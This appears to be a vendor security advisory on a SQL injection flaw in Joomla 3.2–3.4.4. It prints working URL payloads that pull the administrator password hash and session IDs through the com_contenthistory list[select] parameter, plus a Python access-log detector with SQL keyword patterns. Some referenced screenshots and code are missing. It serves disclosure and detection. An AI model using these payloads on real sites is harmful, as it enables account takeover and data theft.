Recently, Trustwave SpiderLabs researcher Asaf Orpani found a SQL injection vulnerability in versions 3.2 through 3.4.4 of the well-known CMS Joomla. The Security Dog laboratory's analysis of the vulnerability found that its impact is severe, the range of affected sites is wide, and it is easy to exploit. The vulnerability has been fixed in release 3.4.5, so affected websites should be updated promptly. In addition, Security Dog has been tested and protects against this vulnerability.
Detailed description of the vulnerability and how it is exploited
According to Asaf Orpani's analysis, the SQL injection vulnerability is located in /administrator/components/com_contenthistory/models/history.php.
The following lines of Joomla code illustrate the principle behind the vulnerability and help in constructing a payload for it:
After executing the code, the following page is returned, from which the user session can be obtained directly:
The following payload can be tested to obtain the administrator password directly:
http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]= (select 1 from (SELECT COUNT (*), concat (SELECT (select concat (password)) from%23__users limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X)
The payload above cannot extract the session_id; after our laboratory modified it, the following version extracts the session_id reliably.
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]= (select 1=updatexml (1,concat (0x5e24, (select session_id from jml_session limit 0,1), 0x5e24), 1))
As shown below:
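The injection point in both payloads is the same: the list[select] (and list[ordering]) query parameter of the com_contenthistory history view, which should only ever carry a comma-separated column list. As an added example (not code from the original post or from Security Dog), the following Python script scans web-server access-log lines for requests to that view whose list parameters contain SQL syntax instead of plain column names. The log lines are constructed for this example; the script also undoes repeated percent-encoding so a double-encoded copy of the payload is matched in the same decoded form.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines for this example (not from the original post).
# Line 1 carries the session_id payload quoted above, line 2 the same payload
# double percent-encoded; lines 3 and 4 are benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Oct/2015:10:12:09 +0000] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201=updatexml(1,concat(0x5e24,(select%20session_id%20from%20jml_session%20limit%200,1),0x5e24),1)) HTTP/1.1" 500 1190
10.0.0.5 - - [22/Oct/2015:10:12:31 +0000] "GET /index.php?option=com_contenthistory&view=history&item_id=75&type_id=1&list[select]=%2528select%25201%253Dupdatexml%25281%252Cconcat%25280x5e24%252C%2528select%2520session_id%2520from%2520jml_session%2520limit%25200%252C1%2529%252C0x5e24%2529%252C1%2529%2529 HTTP/1.1" 500 1190
10.0.0.7 - - [22/Oct/2015:10:13:00 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8812
10.0.0.8 - - [22/Oct/2015:10:13:30 +0000] "GET /administrator/index.php?option=com_contenthistory&view=history&item_id=3&type_id=1&list[select]=h.version_id,h.version_note HTTP/1.1" 200 4410
"""

# Combined-log-format request line: client IP, then "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# A legitimate list[select] / list[ordering] value: one or more column references
# such as h.version_id, separated by commas. Anything else is suspicious.
COLUMN_LIST = re.compile(
    r"^\s*[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)?(?:\s*,\s*[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)?)*\s*$"
)

# SQL syntax that never belongs in a column list (includes Joomla's #__ table prefix).
SQL_TOKENS = re.compile(
    r"(?i)\b(?:select|union|updatexml|extractvalue|concat|information_schema|sleep|benchmark)\b"
    r"|rand\s*\(|#__"
)

# Parameters of the history view that are interpolated into the query.
WATCHED_PARAMS = ("list[select]", "list[ordering]")


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded values are compared in plain form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_target(target):
    """Return (parameter, decoded value) pairs of a request target that carry SQL
    instead of a plain column list. Only com_contenthistory requests are examined."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("option", [""])[0] != "com_contenthistory":
        return []
    findings = []
    for key in WATCHED_PARAMS:
        for raw in params.get(key, []):
            value = decode_fully(raw)
            if value.strip() == "":
                continue  # an empty ordering/select is the normal default
            if not COLUMN_LIST.match(value) or SQL_TOKENS.search(value):
                findings.append((key, value))
    return findings


def scan_log(text):
    """Scan access-log text and return one finding dict per suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for key, value in inspect_target(m.group("target")):
            hits.append({"ip": m.group("ip"), "param": key, "value": value})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['param']} -> {hit['value'][:60]}")
```

Both malicious lines produce the same decoded value, which is what makes the check robust to encoding tricks; the benign request with list[select]=h.version_id,h.version_note passes because it matches the column-list pattern and contains no SQL token. Pipe real access logs into scan_log to look for attempts against unpatched 3.2 to 3.4.4 installations.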
After gaining a detailed understanding of how the vulnerability is exploited, Security Dog's technical staff tested it and confirmed that the Security Dog website protection product defends against this vulnerability, so users can continue to use it with confidence.
Well-known CMS Joomla Has a SQL Injection Vulnerability